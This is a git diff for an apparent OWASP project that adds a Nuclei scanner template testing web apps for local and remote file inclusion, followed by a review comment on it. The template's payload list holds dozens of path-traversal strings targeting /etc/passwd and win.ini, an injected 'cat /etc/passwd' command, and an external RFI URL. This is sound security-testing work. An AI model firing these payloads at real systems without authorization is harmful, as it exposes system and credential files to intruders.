diff --git a/index.md b/index.md
index 26fe70b..e02f35a 100644
--- a/index.md
+++ b/index.md
@@ -2,7 +2,7 @@
 layout: col-sidebar
 title: OWASP ASVS Security Evaluation Templates with Nuclei
-tags: asvs-security-evaluation-templates-with-nuclei nuclei nuclei-templates asvs asvs-evaluation PoC-generator vulnerablity
+tags: asvs-security-evaluation-templates-with-nuclei nuclei nuclei-templates ASVS asvs-evaluation PoC-generator vulnerablity automation WSTG pentest
 level: 2
 type: tool
 pitch: This project aims to develop nuclei templates for evaluating OWASP Application Security Verification Standard (ASVS) on websites.
@@ -32,3 +32,13 @@ This project aims to develop [Nuclei](https://github.com/projectdiscovery/nucle
 [![alt-text](https://img.shields.io/github/license/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/main/LICENSE)
 This program is free software: You can redistribute it and/or modify it under the terms of the MIT License.
+
+## Contributing
+
+Contributions to this repository are welcome and encouraged. If you have created new Nuclei templates that evaluate additional ASVS requirements or have any idea about current templates, we'd love to hear from you in project Github [Discussions](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/discussions) or our [Slack channel](https://owasp.slack.com/archives/C052939BZ43).
+
+For detailed information and guidelines about contributing in developing template for ASVS evaluation, please check [CONTRIBUTING.md](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/blob/main/CONTRIBUTING.md)
+
+#### Core Team
+The project current core team are:
+- [Hamed Salimain](https://github.com/Snbig) (Project Leader)
diff --git a/templates/9.1.3.yaml b/templates/9.1.3.yaml
index a71233a..31facb1 100644
--- a/templates/9.1.3.yaml
+++ b/templates/9.1.3.yaml
@@ -45,4 +45,4 @@ ssl:
 - type: json
 json:
 - " .tls_version"
-# digest: 4b0a00483046022100ad668aabd5f22ba949265c214a22dd6393fc9d65118f5551704be20c9791b4fa022100a7d26f7b256f003b8db0d8794e22f7e63f051f5674b5ff4ed8a01b6cfa8787e3:236a7c23afe836fbe231d6e037cff444
\ No newline at end of file
+# digest: 4b0a00483046022100e28690ed9b4e02b2f1b32d3e5fea4266b8aea6d668d35365ed9e94ad9515ae8e022100e25e0fd48313f9be115c8f93bb91dc18ad74ebf1997576b72c99e810ac804570:236a7c23afe836fbe231d6e037cff444
\ No newline at end of file
diff --git a/templates/dast/5.3.9.yaml b/templates/dast/5.3.9.yaml
new file mode 100644
index 0000000..d87880d
--- /dev/null
+++ b/templates/dast/5.3.9.yaml
@@ -0,0 +1,144 @@
+id: ASVS-4-0-3-V5-3-9
+
+info:
+ name: ASVS 5.3.9 Check
+ author: AmirHossein Raeisi
+ severity: high
+ classification:
+ cwe-id: CWE-829
+ reference:
+ - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion
+ - https://snbig.github.io/Vulnerable-Pages/ASVS_5_3_9/
+ - https://github.com/projectdiscovery/nuclei-templates/tree/main/dast/vulnerabilities/lfi
+ - https://snbig.github.io/Vulnerable-Pages/ASVS_12_3_3/
+ - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.2-Testing_for_Remote_File_Inclusion
+ tags: asvs,5.3.9
+ description: |
+ Verify that the application protects against Local File Inclusion (LFI) or Remote File Inclusion (RFI) attacks.
+ metadata:
+ max-request: 90
+
+http:
+ - pre-condition:
+ - type: dsl
+ dsl:
+ - 'method == "GET"'
+
+ payloads:
+ LFI-RFI:
+ # LFI (Linux)
+ - '/etc/passwd'
+ - '../etc/passwd'
+ - '../../etc/passwd'
+ - '../../../etc/passwd'
+ - '/../../../../etc/passwd'
+ - '../../../../../../../../../etc/passwd'
+ - '../../../../../../../../etc/passwd'
+ - '../../../../../../../etc/passwd'
+ - '../../../../../../etc/passwd'
+ - '../../../../../etc/passwd'
+ - '../../../../etc/passwd'
+ - '../../../etc/passwd'
+ - '../../../etc/passwd%00'
+ - '../../../../../../../../../../../../etc/passwd%00'
+ - '../../../../../../../../../../../../etc/passwd'
+ - '/../../../../../../../../../../etc/passwd^^'
+ - '/../../../../../../../../../../etc/passwd'
+ - '/./././././././././././etc/passwd'
+ - '\..\..\..\..\..\..\..\..\..\..\etc\passwd'
+ - '..\..\..\..\..\..\..\..\..\..\etc\passwd'
+ - '/..\../..\../..\../..\../..\../..\../etc/passwd'
+ - '.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd'
+ - '\..\..\..\..\..\..\..\..\..\..\etc\passwd%00'
+ - '..\..\..\..\..\..\..\..\..\..\etc\passwd%00'
+ - '%252e%252e%252fetc%252fpasswd'
+ - '%252e%252e%252fetc%252fpasswd%00'
+ - '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
+ - '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00'
+ - '....//....//etc/passwd'
+ - '..///////..////..//////etc/passwd'
+ - '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd'
+ - '%0a/bin/cat%20/etc/passwd'
+ - '%00/etc/passwd%00'
+ - '%00../../../../../../etc/passwd'
+ - '/../../../../../../../../../../../etc/passwd%00.jpg'
+ - '/../../../../../../../../../../../etc/passwd%00.html'
+ - '/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd'
+ - '/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
+ - '\\'/bin/cat%20/etc/passwd\\''
+ - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
+ - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
+ - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
+ - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
+ - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
+ - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
+ - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
+ - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
+ # LFI (Windows)
+ - '\WINDOWS\win.ini'
+ - '../../windows/win.ini'
+ - '....//....//windows/win.ini'
+ - '../../../../../windows/win.ini'
+ - '/..///////..////..//////windows/win.ini'
+ - '/../../../../../../../../../windows/win.ini'
+ - './../../../../../../../../../../windows/win.ini'
+ - '..%2f..%2f..%2f..%2fwindows/win.ini'
+ - '\WINDOWS\win.ini%00'
+ - '\WINNT\win.ini'
+ - '\WINNT\win.ini%00'
+ - 'windows/win.ini%00'
+ - '/...\...\...\...\...\...\...\...\...\windows\win.ini'
+ - '/.../.../.../.../.../.../.../.../.../windows/win.ini'
+ - '/..../..../..../..../..../..../..../..../..../windows/win.ini'
+ - '/....\....\....\....\....\....\....\....\....\windows\win.ini'
+ - '\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini'
+ - '/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini'
+ - '/../../../../../../../../../../../../../../../../&location=Windows/win.ini'
+ - '..%2f..%2f..%2f..%2f..%2fwindows/win.ini'
+ - '..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini'
+ - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'
+ - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini%00'
+ - '..%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini'
+ - '..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini'
+ - '/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini'
+ - '.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/windows/win.ini'
+ - '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../windows/win.ini'
+ - '/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win.ini'
+ - '/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'
+ - '%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini'
+ - '%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'
+ - '/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2ewindows/win.ini/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/windows/win.ini'
+ - '/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\win.ini'
+ - '..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini'
+ - '/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini'
+ - '%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini'
+ - '%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows%5Cwin.ini'
+ # RFI
+ - "https://snbig.github.io/Vulnerable-Pages/ASVS_12_3_3/rfi.txt"
+ fuzzing:
+ - part: query
+ type: replace # replaces existing parameter value with fuzz payload
+ mode: multiple # replaces all parameters value with fuzz payload
+ fuzz:
+ - '{{LFI-RFI}}'
+
+ stop-at-first-match: true
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "bit app support"
+ - "fonts"
+ - "extensions"
+ condition: and
+
+ - type: regex
+ part: body
+ regex:
+ - 'root:.*:0:0:'
+
+ - type: word
+ part: body
+ words:
+ - "d5b82f27-b7a4-4c3e-8b6e-88fd9e97b16a"
+# digest: 4b0a00483046022100b3629f17d8650d25acbacc2d85fae5ad2c1cecf14c89bb28701ce2c7011ffe05022100a6db4746322beb7989b39c1b04fb416b31f02ac55a9690507e46a62ae93f2ac5:236a7c23afe836fbe231d6e037cff444
\ No newline at end of file
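Review bot: The `LFI-RFI` payload list under `payloads:` contains `'../../../etc/passwd'` twice (the fourth entry and again directly after `'../../../../etc/passwd'`), so every fuzzed parameter spends one redundant request and the `max-request: 90` hint counts a duplicate; drop the second occurrence. The single RFI payload fetches `rfi.txt` from a personal GitHub Pages site, which makes the scanned application reach out to a host the project does not control and turns the RFI check into a silent false negative whenever that file moves or changes; I'd host the canary under the project's own namespace or, if the project already relies on it elsewhere, use nuclei's `{{interactsh-url}}` so the check does not depend on third-party content staying put. A short comment above each entry in `matchers:` naming the payload family it confirms (`# win.ini markers`, `# /etc/passwd`, `# RFI canary from rfi.txt`) would help the next maintainer, since the UUID in the third matcher is otherwise unexplained.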